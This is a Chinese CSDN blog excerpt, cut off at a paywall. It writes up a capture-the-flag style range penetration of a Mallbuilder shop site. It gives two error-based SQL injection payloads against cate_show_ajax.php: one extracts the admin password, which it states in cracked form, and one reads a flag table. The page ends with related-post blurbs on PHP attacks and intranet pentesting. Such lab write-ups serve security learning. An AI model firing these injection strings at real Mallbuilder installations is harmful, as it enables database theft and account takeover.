php网站渗透实战_【案例分析】记一次综合靶场实战渗透

最新推荐文章于 2024-05-10 14:14:07 发布
最新推荐文章于 2024-05-10 14:14:07 发布
阅读量767 收藏 1
点赞数
文章标签: php网站渗透实战
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39981360/article/details/111541188
版权

原标题:【案例分析】记一次综合靶场实战渗透

时间有点久,这里主要和大家分享一下思路。

该靶场是多层网络下的综合渗透,只开放了一个web端可以访问,其他均处于内网。

开始渗透

首先进入靶场开放的唯一一个开放的web端。

进入网站首页,发现是Mallbuilder,并且该版本有注入漏洞,可以直接获取管理员密码。

payload:

/cate_show_ajax.php?oper=ajax& call=get_cate POST catid= 12313213131313113) andEXP(~( SELECT* FROM( SElectuserFROMmallbuilder_admin)a limit0, 1)) #

md5解密后得知admin 密码为:mall123!@#

可以通过sql注入获取第一个flag

payload:

/cate_show_ajax.php?oper=ajax& call=get_cate

post提交:

catid= 12313213131313113) andEXP(~( SELECT* FROM( SElectflag FROMflag)a)) #

得到第一个flag

登录管理账号admin 密码为 mall123!@# ,

最低0.47元/天 解锁文章
weixin_39981360
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php网站渗透实战_PHP网站安全-漏洞渗透及解决方式—概述
weixin_39992417的博客
12-19 2381
针对PHP网站主要存在下面几种攻击方式:1、命令注入(Command Injection)2、eval注入(Eval Injection)3、客户端脚本攻击(Script Insertion)4、跨网站脚本攻击(Cross Site Scripting, XSS)5、SQL注入攻击(SQL injection)6、跨网站请求伪造攻击(Cross Site Request Forgeries, C...
PHP基础学习【针对渗透
m0_55854679的博客
12-11 1290
PHP基础教程 PHP属于后端语言,后端的核心在于与数据库交互。 常见的后端语言:ASP、ASPX、PHP、JSP 什么是PHPPHP(超文本预处理器)是一种通用开源脚本语言,是动态语言的一种,动态语言还包括ASP、ASPX、JSP。 PHP语法吸收了C、java、Perl的特点,主要用于web开发领域。 PHP可以将程序嵌入到前端代码(HTML、CSS、JS)执行。 PHP支持几乎所有流行的数据库以及操作系统。 基本语法 PHP头部标风格 <?php ?> <script
phpcms模板嵌入php代码_代码审计之文件操作漏洞
weixin_39796868的博客
11-25 2302
文件操作包括文件包含、文件读取、文件删除、文件修改以及文件上传,这几种文件操作的漏洞有部分的相似点,但是每种漏洞都有各自的漏洞函数以及利用方式,下面我们来具体分析下它们的形成原因、挖掘方式以及修复方案。1. 文件包含漏洞PHP的文件包含可以直接执行包含文件的代码,包含的文件格式是不受限制的,只要能正常执行即可。文件包含又分为本地文件包含(local file include)和远程文件包含(rem...
渗透实战:内网域渗透_内网渗透实例
最新发布
2201_75735270的博客
05-10 743
本文录了一次针对具有二层内网的域环境进行渗透测试的过程,文中涉及了内网域渗透的基本方法、思路和技巧。交替使用了msf、CobaltStrike、frp、chisel、SharpSQLTools等工具,最后通过约束委派拿下了域控。其间运用了很多小工具,文章较长,下面开始此次渗透长途之旅。
Web安全之综合渗透测试
明裕学长的博客
05-24 1829
任务环境说明:服务器场景:Web2003-2服务器场景用户名、密码:未知(关闭链接) 渗透机环境说明:BT5渗透机用户名:root密码:toorKali渗透机用户名:root密码:toorWindows7渗透机用户名:administrator密码:123456 Web2003-2--1 172.16.105.248 1、通过URL访问http://靶机IP/1,对该页面进行渗透测试,将完成后返回的结果内容作为Flag值提交; Flag[flag{htmlcode}] 操作如下 在浏览器中输入
渗透测试 | ThinkPHP渗透
weixin_50464560的博客
03-31 2907
转载至 渗透测试 | ThinkPHP渗透 - FreeBuf网络安全行业门户 前言 ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为 ThinkPHP 它遵循 Apache2开源协议发布,从 Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了 Struts的思想和 TagLib(标签库)、RoR的ORM映射和 ActiveRecord模式。 Thi..
php自查无后门靶场源码,渗透测试源码一套
03-22
在网络安全领域,渗透测试是确保网站和应用程序安全性的重要环节。PHP作为广泛应用的服务器端脚本语言,其安全问题备受关注。"php自查无后门靶场源码"是用于安全专业人士进行自我检测和学习的工具,它提供了一个模拟...
PHP漏洞挖掘(四):PHP漏洞靶场实战分析——课程资源百度网盘下载.txt
05-06
PHP漏洞挖掘(四):PHP漏洞靶场实战分析——课程资源百度网盘下载,,亲测真实有效可用!包含视频+课程资料.zip,在知识星球中也分享了该资源,知识星球:W小哥
网络安全 宽字节注入 CMS网站渗透实战 学术交流
12-05
web安全初学者,跟着公开课学习了一段时间,第一次在靶场环境下,边查询边过关,请教了不少人,对blueCMS系统存在的宽字节注入漏洞成功进入后台,找到后台文件编写路径,写入一句话木马,通过蚁剑连接成功后,开始提...
DVWA-master.zip_DVWA_php_漏洞_靶场
09-24
php攻防练习靶场,多种漏洞组合,练习代码审计,避免开发出现漏洞
渗透测试模拟实战(含靶场环境)——暴力破解、留crontab隐藏后men-shell文件与靶场下载地址(1).txt
04-21
渗透测试模拟实战(含靶场环境)——暴力破解、留crontab隐藏后men-靶场下载地址.txt
完整的渗透测试实战纪实,低危漏洞组合成高危利用!
05-26 1845
0x00一份好的报告标题也很重要哦 PS:原谅下图重码,此漏洞还没修复 报告详情 漏洞标题某国内大厂招聘系统测试 漏洞url* 0x01本次渗透流程 我们一步一步来, 首先我们从忘密码那里开始,这里的验证码可以绕过 我们可以输入用户名来批量爆破存在的用户 因为它这里的数据包是没有验证码的参数的,直接拿top 500姓名来跑 248 — 存在 272 — 不存在 367 —{“code”:{“code”:”0005”,”msgId”:”**“,”msg”:”该用户名/手机号/邮箱关
实战 | 手把手教你如何进行内网渗透
jennycisp的博客
06-25 1891
内网渗透主要是基于前期外围打点getshell的webserver,通过收集webserver上的信息,然后对其他内网主机进行口令上的攻击,当然也有一些基于漏洞的攻击。内网相关概念这里不再进行介绍,大家可以自行百度,诸如什么是域、域与工作组的区别、什么是DC、什么是AD等。当然,概念是生涩难懂的,结合实际环境会有助于理解。某内网靶场的详细教程:Vulnstack(一)内网渗透过程中经常会涉及到内网穿透,如何理解内网穿透以及端口转发、端口映射等相关知识可以参考:如何从零构建对内网穿透的理解。
渗透靶场——vulntarget-d综合靶场
tlovejr的博客
04-01 2797
部署环境 此次靶场共两个个镜像文件,接下来先给大家说一下整个环境的拓扑图以环境布置。 信息收集 扫描主机 扫描同一网段中的存活主机 发现存活主机ip地址(其他ip是我其他机器的ip地址) 192.168.1.17 扫描端口 扫描一下存活靶机的ip地址 nmap -A -p- 192.168.1.17 发现开放了80、81、3306、8888,看这架势应该是宝塔的界面,那就先访问端口看看 访问80端口发现不可 web渗透 访问81端口 在这里发现了一个骑士的cms框架界面 看到底下的版本信息,搜索
网络安全之渗透实战学习
xv7676的博客
05-25 316
对于SCF文件攻击,我们也可以通过下列方法来防止这种攻击的发生:1、使用Kerbeors认证或SMB签名;2、禁用共享文件给未认证用户所提供的写入权限;3、确保使用的是NTLMv2密码并增加口令的复杂程度。
网站综合渗透及实例演示二.zip
weixin_33790053的博客
07-12 77
网站综合渗透及实例演示二.zip 点击进入高速下载通道 转载于:https://www.cnblogs.com/gwrjy/p/7157647.html
实验吧_网站综合渗透_Discuz!
热门推荐
test
10-21 1万+
前言 这个一个实验吧中的环境,分值为50分,下面是题目说明。诶,发现自己很菜。 你是国内一流安全公司的“安全专家”,你带领的团队负责维护国内某金融网站的安全,马上临近双十一购物节,客户要求你对重点保障网站进行“授权安全检查”,希望你能找到网站的漏洞。 操作机器IP:192.168.1.2 目标机器IP:192.168.1.3 题目说明 1、 在不影响客户业务的前提下,你对网站进行了“应用安全...
php网站渗透实战_渗透实战之QQ空间钓鱼网站
weixin_42415491的博客
11-27 976
0x00 前言打开邮箱,发现垃圾箱里躺着一封垃圾邮件一看就是钓鱼邮件,话不多说,搞他。没什么技术含量,看看就好。0x01 渗透过程第一部分直接打开链接除了登陆可以点击,其他超链接都是假的,也太不敬业了。然后发现地址栏域名和垃圾邮箱里面的给的链接的域名不一样,是跳转过去的,遂访问初始的域名。打开一看,phpStudy 探针 2014页面。phpstudy 探针 可以测试 数据库连接,试试...
pikachu渗透靶场网站搭建
10-08
渗透靶场网站的搭建是为了模拟真实环境下的网络攻击和安全测试。下面是一些步骤,可以帮助你搭建一个pikachu渗透靶场网站: 1. 选择合适的操作系统:你可以选择一个适合渗透测试的操作系统,例如Kali Linux或者Parrot OS。 2. 安装Web服务器:你需要在你的系统上安装一个Web服务器,如Apache、Nginx或者Microsoft IIS。 3. 创建虚拟环境:为了确保安全,最好在虚拟环境中搭建渗透靶场网站。你可以使用虚拟化软件如VirtualBox或者VMware来创建虚拟机。 4. 安装渗透测试工具和漏洞:在虚拟环境中安装一些常用的渗透测试工具和漏洞,如Metasploit、Nmap、Burp Suite、DVWA等。 5. 配置网络设置:为虚拟机设置网络连接,确保能够访问该靶场网站。 6. 搭建靶场网站:你可以使用一些开源的渗透测试训练平台来搭建靶场网站,如pikachu、OWASP WebGoat等。按照相应的文档说明进行部署和配置。 7. 启动渗透测试:一旦靶场网站搭建完毕,你就可以开始进行渗透测试。使用你安装的渗透测试工具,对靶场网站进行攻击并发现漏洞。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值